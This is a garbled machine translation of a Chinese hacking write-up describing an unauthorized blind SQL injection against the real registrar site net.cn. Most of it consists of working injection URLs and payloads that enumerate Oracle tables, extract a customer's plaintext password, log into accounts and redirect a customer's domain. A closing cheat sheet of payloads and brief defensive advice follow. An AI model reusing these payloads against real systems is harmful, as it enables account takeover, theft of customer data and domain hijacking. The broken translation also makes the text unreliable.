This article links from
Hacking base
original:
Wan Net's 尴尬 - Wan Net Oracle Inject Vulnerability Exposure
Some time ago, after the project in the hand, I was free to travel online. See what there is anything for friends to talk to what you have?
The forum opened. Welcome everyone to play Download Dongdong, or the domain name of .com, .com.cn is very envious. Shrimp me when I have my own host and top domain name ... fantasy in the water ... Thinking of applying for host and domain name, naturally think of China Wan Net (too famous in China ^
_ ^). Go to see it, see how many meters is to see the bottom. Just open the home page of Wanwang. Wow, a standard ASP.NET host has 1600 yuan a year ... a domain is 200. Just want to count, I saw the upper right corner of the homepage.
Member login interface, usually do
Safety habits let me "thieves" heart again. Oh, let's take a look at what can I find.
Vulnerability, get
Members are better, anyway, there is nothing to do now.
Just turn it in the website, see: Wan Net (
_BLANK>
Www.net.cn) is China's largest domain name and website hosting
service provider. China Internet
The flagship of the service industry. Name has more than 10 years Unix
Experience system engineer, Cisco router expert, Orcale
Database expert, Microsoft MCSE certified engineer, Java / ASP / Perl / C
Programming master and
The internet
Security experts. Cough ... sweat. This big website
Server
Safety measures I didn't know how to do n. Maybe a map, add N advanced IDS and FW, maybe it's also a honeypot waiting, the patch is willing to fight early. Take out the port scan
The tool sweeps ... depressed ....... It seems directly from
server
Invasion is nothing to hope ...
Continue to turn, discover a situation, 嘿, 万 网 's site uses the ASP written. You must know that the ASP MSSQL's injection of ASP MSSQL, but a lot of sites have suffered. Do you have this problem with this big website? No matter, try it first. Find a link:
_Client / buy / vir
_HOST / VIR
_host1
_SB.ASP? Packageid = 10341 "Target =
_BLANK>
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341
This is a page that purchases the virtual host, first test it with a classic and 1 = 1 and 1 = 2 method. I halo ~ all all return types do not match: 'CDBL' errors. Oh, is it really not good? Still not willing, let's take a look at what to use.
Database. Add a single quotes after the parameter, submit, the page returns an error:
ORAOLDB error '80004005'
ORA-01756: Strings in parentheses do not end correctly
/ HAS
_Client / buy / vir
_HOST / VIR
_host1
_Sb.asp, line 285
Haha, it used to use oracle. No wonder. Generally used Oracle
There may be problems with such return errors in the database. This is similar to what uncompromed quotes in MSSQL, but MSSQL has such errors, we can almost certainly inject injection.
The loopholes, and Oracle must further determine it.
I have a spirit and continue to make a further judgment. Note that the following steps are determined by our back
The foundation of the invasion is very important.
We will submit it separately: _Client / Buy / Vir
_HOST / VIR
_host1
_Sb.asp? Packageid = 10341'and% 200 <> "Target =
_BLANK>
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0 (Buy) (select count(- ) From ALL
_Tables)% 20AND% 20'1 '=' 1
_Client / buy / vir
_HOST / VIR
_host1
_Sb.asp? Packageid = 10341'and% 200 <> "Target =
_BLANK>
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0 "(select count(- ) FROM User
_Tables)% 20AND% 20'1 '=' 1
_Client / buy / vir
_HOST / VIR
_host1
_Sb.asp? Packageid = 10341'and% 200 <> "Target =
_BLANK>
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0 "(select count(- ) FROM User
_Tab
_COLUMNS)% 20AND% 20'1 '=' 1
How do you see if there is any Oracle system table that we guess? ALL
_Tables, User
_Tables and User
_Tab
_COLUMNS. We will rely on these system tables in the future. If not, there is no way to play.
The page is all successfully returned, indicating that there is a speculated system table, and also explains the SQL statement we submit, and the program has processed. At this point, it also confirmed that this page does exist SQL injection.
Vulnerability. Yeah!
After sending N-blocks to Wan Net without reacting, I started further penetration.
Below, we start formal injection. Of course, if the page of the system table is not returned to the page, most of us cannot succeed. ^
_ ^
First let us sort out the ideas.
The most critical is the user's account information, and the most critical is the user's username and
password. Our primary goal is this. How to be in Oracle
Locate this information in the database. Let's do this, user
_Tab
_COLUMNS This system table stores all the column names of all user tables. We will start from here. submit:
_Client / buy / vir
_HOST / VIR
_host1
_Sb.asp? Packageid = 10341'and% 200 <> "Target =
_BLANK>
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0 "(select count(- ) FROM User
_Tab
_COLUMNS% 20where% 20COLUMN
_name% 20Like% 20 '% 25Password% 25')% 20AND% 20'1 '=' 1
Here is the meaning of query user
_Tab
_COLUMNS table has column names containing the Password string.
The page returns correctly, haha, indicating that the column name is included in the PASSWORD string.
We can also test PWD, Admin, Pass, etc. sensitive fields. Here we start from password. I know that there is a column name containing the Password string. Then how do we know what table contains this column name? We do this, submit
_Client / buy / vir
_HOST / VIR
_host1
_Sb.asp? Packageid = 10341'and% 200 <> "Target =
_BLANK>
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0 "(select count(- ) FROM User
_Tab
_COLUMNS% 20where% 20COLUMN
_Name% 20Like% 20 '% 25Password% 25'% 20and% 20SUBSTR (table
_name, 1, 1) = 'a')% 20AND% 20'1 '=' 1
Here is the meaning of viewing
Is there a column name in the table that starts with a a table in the table is included in the PASSWORD field. If a page will return correctly. Otherwise it will report an error:
Microsoft VBScript runtime error error '800A000D'
Type mismatch: 'CDBL'
/ HAS
_Client / include / VH
_GetProperty.asp, line 46
Figure:
But this one is really ... too tired ... 26 letters ....... Here I use the NBSI's background management address scan function to perform automatic detection. We do this:
The address of the NBSI's background management address scan is DICT
_Admin.txt This file is controlled. We replace the contents of the document:
Vir
_host1
_Sb.asp? Packageid = 10341'and% 200 <> (select% 20count (*)% 20FROM% 20User
_Tab
_COLUMNS% 20where% 20COLUMN
_Name% 20Like% 20 '% 25Password% 25'% 20and% 20SUBSTR (table
_name, 1, 1) = 'a')% 20AND% 20'1 '=' 1
Vir
_host1
_Sb.asp? Packageid = 10341'and% 200 <> (select% 20count (*)% 20FROM% 20User
_Tab
_COLUMNS% 20where% 20COLUMN
_Name% 20Like% 20 '% 25Password% 25'% 20and% 20SUBSTR (table
_name, 1, 1) = 'b')% 20AND% 20'1 '=' 1
Vir
_host1
_Sb.asp? Packageid = 10341'and% 200 <> (select% 20count (*)% 20FROM% 20User
_Tab
_COLUMNS% 20where% 20COLUMN
_Name% 20Like% 20 '% 25Password% 25'% 20and% 20SUBSTR (table
_name, 1, 1) = 'c')% 20AND% 20'1 '=' 1
.
.
.
Then we fill in the scan address in the program.
_Client / buy / vir
_host "target = _blank>
Http://www.net.cn/has_client/buy/vir_host. Point start scanning. NBSI starts to help us with the address set by GET. There is a problem here, that is, 500 error NBSI will also display in the result bar below, and we only need it to display the address of 200 OK. How to do it? We took out our WPE PRO. WPE Pro is a real-time intercepted modified data package
tool. We use it to change the returned 500 error to 404 pages. The NBSI will not display this 500 error address below. WPE's specific usage, I am not detailed here, there is online
Tutorial. Give a screenshot.
In this way, we can make us guess the efficiency improvement. This is the same.
By guess, we have gotten a sensitive field in a table that starts with C, D, H, M, S, and V. Let's see it one by one. Tired :)
Let's see C.
There may be a lot of data sheets starting with C in the database. Which one is what we need. We continue to guess the second place. Put DICT
_Admin.txt (hereinafter referred to as the admin) file is replaced with all the replacement features:
Vir
_host1
_Sb.asp? Packageid = 10341'and% 200 <> (select% 20count (*)% 20FROM% 20User
_Tab
_COLUMNS% 20where% 20COLUMN
_Name% 20Like% 20 '% 25Password% 25'% 20and% 20SUBSTR (table
_name, 1, 2) = 'ca')% 20AND% 20'1 '=' 1
Vir
_host1
_Sb.asp? Packageid = 10341'and% 200 <> (select% 20count (*)% 20FROM% 20User
_Tab
_COLUMNS% 20where% 20COLUMN
_Name% 20Like% 20 '% 25Password% 25'% 20and% 20SUBSTR (table
_name, 1, 2) = 'cb')% 20AND% 20'1 '=' 1
Vir
_host1
_Sb.asp? Packageid = 10341'and% 200 <> (select% 20count (*)% 20FROM% 20User
_Tab
_COLUMNS% 20where% 20COLUMN
_Name% 20Like% 20 '% 25Password% 25'% 20and% 20SUBSTR (table
_name, 1, 2) = 'cc')% 20AND% 20'1 '=' 1
.
.
.
Perform detection again. OK, get the first two characters we need to be CU. Then detect the third bit. . . This is cycled. Finally, it is obtained by customermst with CustomerMST including the sensitive column name. I saw Customer ... Hey, there is a play. Of course, you can submit it when you guess five characters.
_Client / buy / vir
_HOST / VIR
_host1
_SB.ASP? Packageid = 10341'and "target =
_BLANK>
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0 <> (Select Count (*) from User
_Tables Where Table
_Name Like '% 25xxxxx% 25' and length (table_name) = n) and '1' = '1
It is to determine how the length of the guessing table name is. This is more accurate and fast.
Guess the table name, you can submit:
_Client / buy / vir
_HOST / VIR
_host1
_SB.ASP? Packageid = 10341'and "target =
_BLANK>
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0 <> (Select Count (*) from User
_Tables Where Table
_Name = 'Customermst') and '1' = '1
To confirm. The page is correctly returned to OK. :)
Keep going. To now, we still don't know the specific column name. Let's start to guess the column name of the Customermst table. Since oracle does not have a direct violent field of "砰" as MSSQL, we can only guess, tired. . . Fortunately, you will lose a self-made NBSI WPE soil detector. . . *
_ *. Gossip less, let's guess the column name, change the content of the admin file:
Vir
_host1
_Sb.asp? Packageid = 10341'and% 200 <> (select% 20count (*)% 20FROM% 20User
_Tab
_COLUMNS% 20where% 20table
_Name = 'Customermst'% 20AND% 20SUBSTR (Column
_name, 1, 1) = 'a')% 20AND% 20'1 '=' 1
Vir
_host1
_Sb.asp? Packageid = 10341'and% 200 <> (select% 20count (*)% 20FROM% 20User
_Tab
_COLUMNS% 20where% 20table
_Name = 'Customermst'% 20AND% 20SUBSTR (Column
_name, 1, 1) = 'b')% 20AND% 20'1 '=' 1
Vir
_host1
_Sb.asp? Packageid = 10341'and% 200 <> (select% 20count (*)% 20FROM% 20User
_Tab
_COLUMNS% 20where% 20table
_Name = 'Customermst'% 20AND% 20SUBSTR (Column
_name, 1, 1) = 'c')% 20AND% 20'1 '=' 1
.
.
.
Here is to see which letters starting in the Customermst table by guess. The page returns correctly, that is, return 200 ok, that is, it exists.
By detection, it is known that there is a column name that is starting with A, B, C, E, F, G, I, L, M, O, P, R, S, and U. I am dizzy, so much. . . No way, come slowly. Let's first look at the beginning:
The method here is similar to the method of guess the table name, and the content of the admin file is changed to:
Vir
_host1
_Sb.asp? Packageid = 10341'and% 200 <> (select% 20count (*)% 20FROM% 20User
_Tab
_COLUMNS% 20where% 20table
_Name = 'Customermst'% 20AND% 20SUBSTR (Column
_name, 1, 2) = 'aa')% 20AND% 20'1 '=' 1
Vir
_host1
_Sb.asp? Packageid = 10341'and% 200 <> (select% 20count (*)% 20FROM% 20User
_Tab
_COLUMNS% 20where% 20table
_Name = 'Customermst'% 20AND% 20SUBSTR (Column
_name, 1, 2) = 'Ab')% 20AND% 20'1 '=' 1
Vir
_host1
_Sb.asp? Packageid = 10341'and% 200 <> (select% 20count (*)% 20FROM% 20User
_Tab
_COLUMNS% 20where% 20table
_Name = 'Customermst'% 20AND% 20SUBSTR (Column
_Name, 1, 2) = 'AC')% 20And% 20'1 '=' 1
.
.
.
OK, get the first two is Ar, continue. . . Finally, the name is Areaid. It is important to note that when one bit is detected, there may be multiple results, and there are multiple column names. For example, when detecting the second position in B, Bi and Bu have returned 200 OK, then it will explain that there is a column name starting with BI, BU. In this kind of push, we finally got all the column names of the Customermst table (wiper sweat ...):
AreaID
Birthday
Bizid
Businessstatus
Channel
_STAFFID
CityID
Contact
COUNTRY
Customerid
CustomerIndustry
Customerorigintype
Emailbackup
.
.
.
Password
.
.
.
UserID
.
.
Look at the name, you know that the three fields of Customerid, Password and Userid are the most important.
Wan Net is using a digital ID when landing.
Password logs in. So which of these two IDs is used to log in? We do this. To Wannang Home Log Box, you can check the ID with the method of the user's number ID. Yep. . . What is the name of the user? We don't know anything about the type of data. Turn it on the homepage and find that there is a new customer recommended section at the bottom. Look carefully, there is a real estate portal - SouFun
_BLANK>
Http://www.soufun.com/ Well, use the name of Soufun ~ ^
_ ^
OK, get the ID of the Soufun user is 10529112. Let's take a certainty of which field is the ID field. submit:
_Client / buy / vir
_HOST / VIR
_host1
_Sb.asp? Packageid = 10341'and% 200 <> "Target =
_BLANK>
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0 (Built) (select count(- ) from customermst where customerid='10529112') 20AND% 20'1 '=' 1 wow, the page does not return correctly, returns an error. It seems not this field. Submit again:
_Client / buy / vir
_HOST / VIR
_host1
_Sb.asp? Packageid = 10341'and% 200 <> "Target =
_BLANK>
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0 "(select count(- ) From CUSTOMERMST Where Userid='10529112' )% 20AND% 20'1 '=' 1
Ok, hey, this page is returned correctly. It seems that the userid field is the user login ID. The same method is detected that the Customerid field is the user name.
Field properties know, start guess below
Password, or use this admin user. Of course, still have a guess. I can finally guess
Password, hehe. Not tired. Change the contents of admin files:
Vir
_host1
_SB.ASP? Packageid = 10341'and% 200 <> (Select% 20count (*)% 20FROM% 20CUSTOMERMST% 20where% 20Userid = '10529112'% 20and% 20SUBSTR (Password, 1, 1) = 'a')% 20and % 20'1 '=' 1
Vir
_host1
_SB.ASP? Packageid = 10341'and% 200 <> (select% 20count (*)% 20FROM% 20CUSTOMERMST% 20where% 20Userid = '10529112'% 20and% 20SUBSTR (Password, 1, 1) = 'b')% 20and % 20'1 '=' 1
Vir
_host1
_SB.ASP? Packageid = 10341'and% 200 <> (Select% 20count (*)% 20FROM% 20CUSTOMERMST% 20where% 20Userid = '10529112'% 20and% 20SUBSTR (Password, 1, 1) = 'c')% 20and % 20'1 '=' 1
.
.
.
Vir
_host1
_SB.ASP? Packageid = 10341'and% 200 <> (Select% 20count (*)% 20FROM% 20CUSTOMERMST% 20where% 20Userid = '10529112'% 20and% 20SUBSTR (Password, 1, 1) = '0')% 20and % 20'1 '=' 1
Vir
_host1
_SB.ASP? Packageid = 10341'and% 200 <> (Select% 20count (*)% 20FROM% 20CUSTOMERMST% 20where% 20Userid = '10529112'% 20and% 20SUBSTR (Password, 1, 1) = '1')% 20and % 20'1 '=' 1VIR
_host1
_SB.ASP? Packageid = 10341'and% 200 <> (select% 20count (*)% 20FROM% 20CUSTOMERMST% 20where% 20Userid = '10529112'% 20and% 20SUBSTR (Password, 1, 1) = '2')% 20and % 20'1 '=' 1
.
.
.
Here you have to add a arabian number.
The password is usually the letter plus number :). The above is the user who guess the ID 10529112
The first bit of the password. After a few seconds,
The password is the first place, it is n. Continue to guess the second, method and the method of guessing the name, the same method, the only difference is that there will be no multiple results here. Finally, the ID is 10529112
The password is n ****. I am dizzy.
The password is not encrypted. . .
Database and
Security experts. . . ?
Guess
Password, grace, come on seeee, hehe.
Haha, landing OK! . . . The amount of available amount is actually -130 yuan ..., dizzy! Can you override? Drafting doll
. Not afraid! Find the field of money, Update! Hey ... Unfortunately I tried N times, I don't know how to correct Update and Insert, 5555555. Which master has a good way, everyone exchanges :)
Of course, there is all rights to this account after logging in. Let's take a look at the payment product management. ...... What is Dongdong, dizzy! Let's take a look at this user's financial information:
Well ... Open the most recent transaction. It was found that it turned 130 yuan to 10144167. Is 10144167 This account is rich? : P
Separate 10144167
Password u ******, log in in. Haha, it turned out to be a domain name distribution alliance partner, rich people ~ balance 329 ^
_ ^. Open the payment product management, haha, so many domain names ~: P
Open the domain name analysis of the bottom of the page
Service, HOHO found the Chinese General Domain Name Registration - Soufang.com. China. Click, I came to SouFun. China's domain name analysis
Service page, here we can change SouFun.com. China's resolution to control domain names.
Speaking of this, my mind is no longer gotting
Member. Because this hazard is too big. Think about it, we got the user account and
Password, log in, you can easily change the pointing point to the domain name purchased, pointing to our designated position. Imagine a malicious
Attacks, put a domain name of a business site to a fake site that refers to yourself, then the account information that the user logs in this business site is equal to no
Security can be said. We visited the website of the domain name of the domain will all mess. For the purchase of a virtual host
Users who serve the service, the harm is that
The attacker can fully control the website through the website management system provided by Wanwang. This hazard does not have to be said.
For all the network, all its business may be affected. The data can be arbitrarily acquired tampering. I think there is no customer dare to apply for business, huh, huh. For example, use the above to have a lot of domain names to make a demonstration. I want szsxmd.gd.cn to resolve this domain name to the famous
_BLANK>
www.xfocus.net
Security focus. First of all, I ping
_BLANK>
Www.xfocus.net gets IP 202.106.127.50. Then, I entered the domain name parsing integrated business, add a record in the resolution service of Szsxmd.gd.cn, specifying the resolution IP 202.106.127.50. Figure:
After a few hours, the domain name resolution takes effect. When we visit SZSXMD.GD.cn, we will find that we have come.
Safe focus page :)
When ping szsxmd.gd.cn in the command line, the address resolution is 202.106.127.50 :)
Some of the other hazards are obvious, and it is relatively large, I will no longer do active demonstrations.
The database can be said to be the weight of a site. Through this injection
Vulnerability, we can control
Data in the database, not light is information on user account, all existence
Data in the database, we can get, physical activity. UTL in the open public group
In the case of _file permission, it can also be read with UNION query.
Document on the server, this point and PHP MySQL injection of LOAD
_file () is somewhat similar. Of course, you can also perform Update. Just injecting Oracle, I am still a rookie, I have not updated inserted data and more advanced injection.
attack. And Oracle's injection can only guess, and there is no automation
tool. I use the NBSI's background scan function and WPE to improve efficiency. But I believe that the master is very much, automated
The tool will also appear soon. ^
_ ^
Here, some statements used in some injection:
0 <> (Select Count (*) from ALL
_Tables) and '1' = '1 Guess whether there is all
_Tables system table, confirm injection
0 <> (Select Count (*) from User
_Tab
_COLUMNS WHERE Column
_Name Like '% 25 column keyword% 25') and '1' = '1 Guess whether there is a column name that contains the definition keyword
0 <> (Select Count (*) from User
_Tab
_COLUMNS WHERE Column
_Name Like '% 25 column keyword% 25' and substr (TABLE
_name, 1, 1) = 'a') AND '1' = '1 Contains whether there is a table with a key list. That is, a bit guess is started.
0 <> (Select Count (*) from User
_Tables Where Table
_Name Like '% 25 Name Keyword% 25' and Length (Table
_name) = n) And '1' = '1 Guess the length of the table name containing the keyword
0 <> (Select Count (*) from User
_Tab
_Columns Where Table
_Name = 'Name' and SUBSTR (Column
_name, 1, 1) = 'a') and '1' = '1 guess: column name 0 <> (Select Count (*) from the name where column name 1 =' XXXXXXX 'and SUBSTR (column name 2, 1, 1) = 'a') and '1' = '1 guess data
So, Oracle Injection
What is the principle of vulnerabilities? Here I will introduce it. Take this page we inject.
_Client / buy / vir
_HOST / VIR
_host1
_SB.ASP? Packageid = 10341 "Target =
_BLANK>
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341
The query statement in the source code of the ASP program may be:
Select * from table where packageId = '10341'
Because as a non-open source program
At the attacker, we have no way to know what the source code in the ASP program can only determine the approximate structure by returning error information. So I am a probably look.
Gossip less. Let's analyze. When we accessed this page, the ASP program queries data in the table table in the Table table according to the parameter 10341 submitted in the URL and returns it to us. From the situation we test, this parameter does not make filtering, put it in the query statement, which gives us a condition. When we submit
_Client / buy / vir
_HOST / VIR
_host1
_SB.ASP? Packageid = 10341 "Target =
_BLANK>
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0 <> (Select Count (*) from ALL
_Tables) and '1' = '1. The query statement in the ASP program becomes this:
Select * from table where packageid = '10341' and 0 <> (Select Count (*) from ALL
_Tables) and '1' = '1'
This way we succeed in inserting the query statement we want to insert into the original query statement of the ASP program. This is different from the MSSQL, we can't use the symbol to comment out the following statement, the back and '1' = '1 is to match the number of quotes, so that the entire query statement is established and returned to the page. For example
_Client / buy / vir
_HOST / VIR
_host1
_SB.ASP? Packageid = 10341 "Target =
_BLANK>
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0 <> (Select Count (*) from ALL
_Tables) and '1' = '1' and 'x' = 'X The entire page is also normal returned.
_ ^.
It is actually necessary to prevent this injection, as long as the parameters submitted in the URL are strictly filtered, remove some characters such as single quotes, SQL keywords, etc., should be, the attacker has no chance. Can the specific approach are in the URL submitted? The string behind, finds a single quotation mark, semicolon, SQL keyword, etc., etc., and immediately jump to a custom Error page. Personally think this is a better way. Especially for non-open source procedures
Attacks are almost a road.
The internet
Safety is multifaceted, each link must be noted. You can use a chain to make a metaphor. If you have any questions in this chain, then the whole chain is broken. Just like this
Vulnerabilities, although it is just a small problem, but its impact is very large, and it can easily change the point to the Wanwang customer domain. If I point a lot of domain names to a certain site, then this site is equivalent to. and so
On the network
Safety is not a matter of some or some people, but it is necessary for us to do well from top to top. In addition, since I have experienced a lot of worms,
Virus
After attack, everyone is generally
Server
Safe payment, equipped FW, IDS, and telecommunications also participated in some ports. Some sites have only opened 80. Then in
Running on the server
Coded
Safe, it is very important. A small end of a small place is likely to cause global collapse. defense
Technology is constantly progressing,
Attack methods are also constantly refurbished. Today, there is SQL injection, what will happen tomorrow? Always pay attention to the latest
Attack measures, I want to be very important for an excellent administrator. Unfortunately, there are now many programmers write
There is no one when the code is
Safety awareness, and administrators just write well
Code is placed
On the server, tube
Server
Safety (our company is like this, huh, huh),
Code writing
Vulnerability has become a breakthrough. I started from high school.
Security issues are now working in this area. It can be said that now
The network is compared to before,
Too much is safe, but
Technology is progressing, today
Safety does not mean tomorrow
Safety.
Safety is an eternal topic. I personally feel that those worms,
Virus, is a strengthening network management
The most powerful weapon of safety awareness, I believe, using
Code defect
Attack, will also strengthen programmers to write
Coded
safety consciousness. ^
_ ^
Finally, I hope that Wan Net will solve this
Vulnerabilities, for experts, I want to solve this problem may spend less than 5 minutes. In addition, strengthen your own
Database data
Safe, add a bine. Also, your email
The server is no problem? By the way, there are many sites in China to have an injection.
Vulnerability, such as XX home, XX department, etc.
Thank you for your patience to read my 文. Even levels are limited, if there is any mistake, you are welcome to correct, even MSN: War3apollo@hotmail.com. For the world outside, I will always be a rookie :).
